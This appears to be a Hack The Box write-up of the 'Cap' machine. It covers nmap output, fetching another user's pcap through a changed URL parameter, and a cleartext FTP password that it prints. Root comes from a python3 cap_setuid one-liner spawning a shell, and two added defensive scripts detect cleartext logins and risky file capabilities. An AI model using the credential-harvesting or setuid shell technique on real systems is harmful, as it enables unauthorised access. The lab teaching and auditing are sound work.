HTB Walkthrough: Cap

pentestsky

Last updated on October 1, 2021

Today we come with another challenge from Hack The Box called Cap. This is an easy-level machine on which unencrypted traffic is flowing, and we analyze that traffic with Wireshark. So, without wasting time, let's start the machine.

Level: Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • PCAP dump
    • Analyze pcap file
    • extract Credentials from pcap file
  • Privilege Escalation
    • Abusing capabilities

Walkthrough

IP Address: 10.10.10.245

We start with an nmap scan, using the default scripts (-sC) and version detection (-sV) to grab banners from the server. Nmap reveals several open ports and services on the target: port 21 (FTP), port 22 (SSH) and port 80 (HTTP).

nmap -sC -sV -p- 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:54 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
|_http-server-header: gunicorn

On port 21 (FTP), anonymous login is not allowed and this vsftpd version is not directly exploitable, so we move on to port 80 and start enumeration. After some time we gather information from the profile page, such as the username "Nathan".

Enumeration

The landing page has one more function: taking a snapshot of network traffic for analysis. We download a pcap file for analysis and start enumerating it for services and any other details. After some time we simply retrieve the 0.pcap file by changing the URL parameter.

The 0.pcap file contains many protocols, such as HTTP. A pcap file is long to read through, so we filter the traffic according to what we need. After spending some time on it we find the credentials, so we simply SSH to the service, and it works.
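The filtering described above can be done in Wireshark with a display filter such as ftp.request.command == "USER" || ftp.request.command == "PASS". As an added example that is not part of the original walkthrough, the Python script below does the same thing offline and from a defender's point of view: it parses the classic pcap format with the standard library only, reports every FTP USER/PASS command sent to port 21 in cleartext, and masks the password value in its report. The capture it runs on is constructed inside the script (its own frames, with a made-up alice/s3cret login and unrelated HTTP noise), not the machine's 0.pcap, and all function names are the example's own.

```python
import struct


def _ipv4(addr):
    return bytes(int(part) for part in addr.split("."))


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame around PAYLOAD.
    Checksums are left at zero, which is fine for offline parsing."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     _ipv4(src_ip), _ipv4(dst_ip)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip  # zeroed MACs, EtherType IPv4


def build_sample_pcap():
    """Constructed capture: one FTP login (made-up credentials) plus HTTP noise."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    frames = [
        _frame("192.0.2.10", "192.0.2.21", 40000, 21, b"USER alice\r\n"),
        _frame("192.0.2.21", "192.0.2.10", 21, 40000, b"331 Please specify the password.\r\n"),
        _frame("192.0.2.10", "192.0.2.21", 40000, 21, b"PASS s3cret\r\n"),
        _frame("192.0.2.10", "192.0.2.80", 40001, 80, b"GET / HTTP/1.0\r\n\r\n"),
    ]
    out = bytearray(header)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame)) + frame
    return bytes(out)


def iter_frames(pcap):
    """Yield the raw link-layer bytes of each record in a classic (non-pcapng) pcap."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet captures are handled here")
    offset = 24
    while offset + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", pcap, offset)
        offset += 16
        yield pcap[offset:offset + incl_len]
        offset += incl_len


def parse_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload), or None if not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    total_len = struct.unpack_from("!H", frame, 16)[0]
    src = ".".join(str(b) for b in frame[26:30])
    dst = ".".join(str(b) for b in frame[30:34])
    tcp_start = 14 + ihl
    sport, dport = struct.unpack_from("!HH", frame, tcp_start)
    data_off = (frame[tcp_start + 12] >> 4) * 4
    # Trim to the IP total length so Ethernet padding never leaks into the payload.
    return src, dst, sport, dport, frame[tcp_start + data_off:14 + total_len]


def find_cleartext_ftp_logins(pcap, ftp_port=21):
    """Offline equivalent of filtering ftp.request.command for USER/PASS in Wireshark.
    Returns (src, dst, command, argument) for each credential sent in the clear."""
    findings = []
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None or parsed[3] != ftp_port:
            continue
        src, dst, _sport, _dport, payload = parsed
        for line in payload.split(b"\r\n"):
            if line[:5] in (b"USER ", b"PASS "):
                findings.append((src, dst, line[:4].decode(), line[5:].decode(errors="replace")))
    return findings


def report(findings):
    """Print findings as a defender would: the password value is masked."""
    for src, dst, cmd, arg in findings:
        shown = arg if cmd == "USER" else "*" * len(arg)
        print(f"{src} -> {dst}: FTP {cmd} {shown} sent in cleartext")


if __name__ == "__main__":
    report(find_cleartext_ftp_logins(build_sample_pcap()))
```

The lesson the box teaches is on the last line of the report: FTP sends the password in the clear, so anyone who can read the capture (here, anyone who can fetch it from the dashboard) holds the credential. Replacing FTP with SFTP or FTPS and restricting who can download captures removes both halves of the problem.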

Privilege Escalation

With these credentials we SSH into the server. Now it is time to get root, so we start with manual enumeration: checking the passwd file, SUID bits, etc.

Username : nathan

Password : Buck3tH4TF0RM3!

Username and password from the PCAP file

After some time we learn that we can abuse file capabilities, in this case through python; GTFOBins shows how to abuse the capability. After successful exploitation we get root and collect the flags.

getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
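File capabilities are invisible to the usual find / -perm -4000 SUID sweep, which is why the getcap -r pass above belongs in every checklist, on the defender's side as much as the attacker's. The Python snippet below is an added example, not from the original post: it parses getcap output in both layouts libcap has used (the older "PATH = caps+flags" and the newer "PATH caps=flags" of libcap 2.41+), flags the capabilities that grant privilege, calls out interpreters specially because any capability on them is effectively granted to every user who can run them, and prints the setcap -r command that strips the capability. The sample lines, including the /opt/demo/python3 path, are constructed for the example.

```python
import re
import shlex
from pathlib import PurePosixPath

# Capabilities that let their holder change identity or bypass access control.
# cap_setuid is the one abused on this box; the rest are its close relatives.
HIGH_RISK_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
}
# Binaries that run user-supplied code: a capability on one of these is
# effectively granted to every local user allowed to execute it.
INTERPRETERS = ("python", "perl", "ruby", "node", "php", "lua")

# One clause of a capability spec: names, operator, flag letters (e/i/p).
CLAUSE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")

# Constructed sample output (not the machine's); /opt/demo/python3 is a placeholder path.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/opt/demo/python3 = cap_setuid+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""


def parse_getcap_line(line):
    """Parse one 'getcap -r' line into (path, {cap: flags}).
    Accepts the old 'PATH = caps+flags' layout and the newer 'PATH caps=flags'
    layout (libcap 2.41+); paths containing spaces are not handled."""
    line = line.strip()
    if " = " in line:
        path, spec = line.split(" = ", 1)
    else:
        path, spec = line.rsplit(" ", 1)
    caps = {}
    for clause in spec.split():
        match = CLAUSE.match(clause)
        if not match:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names, _operator, flags = match.groups()
        for name in names.split(","):
            caps[name] = flags
    return path, caps


def audit_getcap(output):
    """Return (path, cap, reason) for every file capability an audit should question."""
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, caps = parse_getcap_line(line)
        base = PurePosixPath(path).name
        for cap, flags in caps.items():
            if cap not in HIGH_RISK_CAPS and cap != "all":
                continue
            if "p" not in flags and "e" not in flags:
                continue  # inheritable-only: not gained merely by executing the file
            reason = f"{cap} is permitted/effective on {base}"
            if base.startswith(INTERPRETERS):
                reason += "; on an interpreter this hands the capability to any user who can run it"
            findings.append((path, cap, reason))
    return findings


def remediation(path):
    """The remediation: strip the file capability with setcap -r."""
    return f"setcap -r {shlex.quote(path)}"


if __name__ == "__main__":
    for path, cap, reason in audit_getcap(SAMPLE_GETCAP):
        print(f"[!] {path}: {reason}\n    fix: {remediation(path)}")
```

Run against real output by piping getcap -r / 2>/dev/null into the script and passing the text to audit_getcap. Note that ping, tcpdump and gnome-keyring-daemon are left alone: cap_net_raw and cap_ipc_lock are what those binaries legitimately need, and the point of an audit is to find the one capability that does not belong, not to strip them all.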
